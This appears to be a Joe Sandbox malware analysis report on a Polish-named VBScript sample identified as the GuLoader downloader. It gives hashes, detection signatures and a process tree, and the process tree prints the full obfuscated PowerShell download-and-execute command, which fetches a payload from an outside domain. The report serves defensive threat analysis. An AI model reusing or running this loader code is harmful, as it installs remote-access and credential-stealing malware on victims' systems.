Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs

Overview

General Information

Sample name:Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
Analysis ID:1541193
MD5:740d51a6d22d43f1b99e61c9d3366237
SHA1:712c28e59ff11135e1957f86d8e6a995ad772de6
SHA256:e301c6308fff6e0e1d3e399a2ad2eb623f2f36590ff60766d16efbe6f4c154dc
Tags:vbsuser-Maciej8910871
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7468 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7544 cmdline: ping Horm5zl_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse 'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere (Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav ') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4 Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc ,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred ') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere (Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv ');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu= atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere (Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma UnmS HylITilhO SkanPro.. nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7852 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse 'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere (Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav ') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4 Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc ,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred ') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere (Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv ');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu= atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere (Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma UnmS HylITilhO SkanPro.. nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2673637961.0000000008380000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000006.00000002.2659683449.000000000569C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000006.00000002.2673783211.00000000097DB000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 7608JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7608.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7608.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfc8d:$b2: ::FromBase64String(
              • 0xd055:$s1: -join
              • 0x6801:$s4: +=
              • 0x68c3:$s4: +=
              • 0xaaea:$s4: +=
              • 0xcc07:$s4: +=
              • 0xcef1:$s4: +=
              • 0xd037:$s4: +=
              • 0xe82b:$s4: +=
              • 0xe8ab:$s4: +=
              • 0xe971:$s4: +=
              • 0xe9f1:$s4: +=
              • 0xebc7:$s4: +=
              • 0xec4b:$s4: +=
              • 0xf462:$e4: Get-WmiObject
              • 0xf651:$e4: Get-Process
              • 0xf6a9:$e4: Start-Process
              amsi32_7852.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe00d:$b2: ::FromBase64String(
              • 0xb4a1:$s1: -join
              • 0x4c4d:$s4: +=
              • 0x4d0f:$s4: +=
              • 0x8f36:$s4: +=
              • 0xb053:$s4: +=
              • 0xb33d:$s4: +=
              • 0xb483:$s4: +=
              • 0xcc77:$s4: +=
              • 0xccf7:$s4: +=
              • 0xcdbd:$s4: +=
              • 0xce3d:$s4: +=
              • 0xd013:$s4: +=
              • 0xd097:$s4: +=
              • 0xd8ae:$e4: Get-WmiObject
              • 0xda9d:$e4: Get-Process
              • 0xdaf5:$e4: Start-Process
              • 0x16225:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", ProcessId: 7468, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs", ProcessId: 7468, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnH

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
              Source: unknownHTTPS traffic detected: 188.241.183.203:443 -> 192.168.2.11:49737 version: TLS 1.2
              Source: Binary string: stem.Core.pdbTE source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /Bennington.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: deseuri-romania.roConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
